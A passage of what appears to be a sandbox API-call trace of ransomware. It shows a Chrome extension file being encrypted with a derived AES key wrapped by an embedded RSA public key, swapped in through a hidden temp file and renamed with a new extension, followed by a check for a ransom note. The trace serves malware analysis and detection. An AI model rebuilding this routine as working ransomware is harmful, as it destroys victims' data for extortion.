(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json", dwFileAttributes=0x80) returned 1 [0264.269] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.270] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.271] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.271] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.273] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.273] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.273] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.273] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0264.273] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.273] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.273] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e76980) returned 1 [0264.274] CryptImportPublicKeyInfo (in: hCryptProv=0x2e76980, dwCertEncodingType=0x1, pInfo=0x2eaf710*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf740*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf748*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ee80) returned 1 [0264.274] CryptEncrypt (in: hKey=0x2e7ee80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.274] CryptEncrypt (in: hKey=0x2e7ee80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76078*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e76078*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.274] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e76078*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e76078*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.277] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.286] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.286] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.297] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.298] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.298] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.298] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.298] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.298] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.298] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.298] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.298] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.298] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.298] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.298] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.298] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.299] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.299] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.299] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.299] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.299] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.299] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.299] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.300] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.300] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.300] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.300] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.300] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.300] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.300] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.300] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.301] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.301] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.301] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.301] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.301] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.301] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.301] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.301] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.301] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.301] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.301] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.301] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.301] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x264, lpOverlapped=0x0) returned 1 [0264.301] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x264, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x270) returned 1 [0264.301] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x270, lpOverlapped=0x0) returned 1 [0264.301] CloseHandle (hObject=0x5d60) returned 1 [0264.301] CloseHandle (hObject=0x5d5c) returned 1 [0264.302] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0264.308] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0264.308] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.gsg")) returned 1 [0264.309] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.fuck")) returned 1 [0264.311] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0264.311] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.311] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.311] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.311] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0264.311] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0264.311] AreFileApisANSI () returned 1 [0264.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 